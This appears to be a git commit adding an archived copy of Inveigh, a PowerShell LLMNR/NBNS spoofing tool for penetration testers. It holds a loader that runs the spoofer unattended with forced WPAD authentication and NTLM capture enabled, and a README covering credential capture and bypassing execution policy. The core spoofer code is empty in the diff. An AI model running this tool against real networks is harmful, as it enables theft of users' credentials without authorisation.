Old version

Keeping the older version easily accessible until the new version is
tested more.

6 files changed, 149 insertions, 0 deletions

diff --git a/old/Inveigh-Loader.ps1 b/old/Inveigh-Loader.ps1
new file mode 100644
index 0000000..5e4f4ac
--- /dev/null
+++ b/old/Inveigh-Loader.ps1
@@ -0,0 +1,77 @@
+<#
+.SYNOPSIS
+Inveigh Loader provides additional options for running Inveigh as an unattended payload.
+
+.DESCRIPTION
+Inveigh Loader can load Inveigh with set parameters and stop execution after specified amount of time. Inveigh can be either loaded as a separate script or through a scriptblock embedded within this script. If the scriptblock method is selected, the current Inveigh.ps1 code must be copied into the $inveigh_scriptblock below. This is a basic version, additional features will be added.
+#>
+
+# Inveigh loader parameters
+$run_length = 1 # Set the number of minutes Inveigh will run
+$start_job_method = "filepath" # Set the Job-Start method. filepath,scriptblock
+
+# Inveigh parameters - refer to Inveigh.ps1 for details
+$IP = ""
+$SpooferIP = ""
+$HTTP = "Y"
+$HTTPS = "N"
+$SMB = "Y"
+$LLMNR = "Y"
+$NBNS = "N"
+$NBNSTypes = @("20") # Format for multiples = @("00","20")
+$Repeat = "Y"
+$ForceWPADAuth = "Y"
+$Output = "0"
+$OutputDir = ""
+
+if(-not($IP))
+{ 
+    $IP = (Test-Connection 127.0.0.1 -count 1 | select -ExpandProperty Ipv4Address)
+}
+
+if(-not($SpooferIP))
+{
+    $SpooferIP = $IP  
+}
+
+if(-not($OutputDir))
+{
+    $OutputDir = $PWD.Path  
+}
+
+$inveigh_scriptblock =
+{ # begin $inveigh_scriptblock - paste Inveigh.ps1 code below this line if using $start_job_method = "scriptblock"
+
+} # end $inveigh_scriptblock
+
+try
+{
+    if ($start_job_method -eq "filepath")
+    {
+        Start-Job -Name Inveigh -FilePath .\Inveigh.ps1 -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null
+    }
+    elseif ($start_job_method -eq "scriptblock")
+    {
+        Start-Job -Name Inveigh -ScriptBlock $inveigh_scriptblock -ArgumentList $IP,$SpooferIP,$HTTP,$HTTPS,$SMB,$LLMNR,$NBNS,$NBNSTypes,$Repeat,$ForceWPADAuth,$Output,$OutputDir | Out-Null
+    }
+    else
+    {
+        throw "Invalid $start_job_method."
+    }
+    
+    $run_timeout = new-timespan -Minutes $run_length
+    $run_stopwatch = [diagnostics.stopwatch]::StartNew()
+    
+    while ($run_stopwatch.elapsed -lt $run_timeout)
+    {
+        Receive-Job -name Inveigh
+    }
+
+}
+finally
+{
+    Stop-Job -name Inveigh
+    Receive-Job -name Inveigh
+    Remove-Job -name Inveigh
+    write-warning "Inveigh Loader exited at $(Get-Date -format 's')"
+}
diff --git a/old/Inveigh.ps1 b/old/Inveigh.ps1
new file mode 100644
index 0000000..436d505
--- /dev/null
+++ b/old/Inveigh.ps1
diff --git a/old/LICENSE.md b/old/LICENSE.md
new file mode 100644
index 0000000..9790f29
--- /dev/null
+++ b/old/LICENSE.md
@@ -0,0 +1,31 @@
+Inveigh is provided under the 3-clause BSD license below.
+
+*************************************************************
+
+Copyright (c) 2015, Kevin Robertson
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of Inveigh nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/old/README.md b/old/README.md
new file mode 100644
index 0000000..2255b06
--- /dev/null
+++ b/old/README.md
@@ -0,0 +1,29 @@
+# Inveigh
+Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.
+
+# Requirements
+Tested minimums are PowerShell 2.0 and .NET 3.5.
+
+# Notes
+1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture.
+2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. 
+3. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
+4. HTTP challenge/response captures are performed with a dedicated listener.
+5. The local LLMNR/NBNS services do not need to be disabled on the host system. 
+6. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
+7. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
+8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
+9. Output files will be created in current working directory.
+10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
+
+# Usage
+Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy.
+
+To execute with default settings:  
+Inveigh.ps1
+
+To execute with features enabled/disabled:   
+Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path'
+
+# Screenshot
+![inveigh-screenshot2](https://cloud.githubusercontent.com/assets/5897462/9102520/62f199c4-3bc1-11e5-87a7-08837950a04f.PNG)
diff --git a/old/TODO.md b/old/TODO.md
new file mode 100644
index 0000000..f137a8c
--- /dev/null
+++ b/old/TODO.md
@@ -0,0 +1,12 @@
+## To Do
+- [ ] Code cleanup
+- [x] Add NBNS spoofer
+- [x] Add ability to capture NTLMv1 challenge/responses
+- [ ] Add ability to capture LM challenge/responses
+- [x] Add HTTP for challenge/response captures
+- [x] Add HTTPS for challenge/response captures
+- [x] Add Get-Help style comments
+- [ ] Add SMB listener
+- [ ] Add exfiltration method for captures
+- [ ] Add SMBRelay
+- [ ] Add wpad.dat
\ No newline at end of file
diff --git a/old/inveigh.pfx b/old/inveigh.pfx
new file mode 100644
index 0000000..5fa7503
--- /dev/null
+++ b/old/inveigh.pfx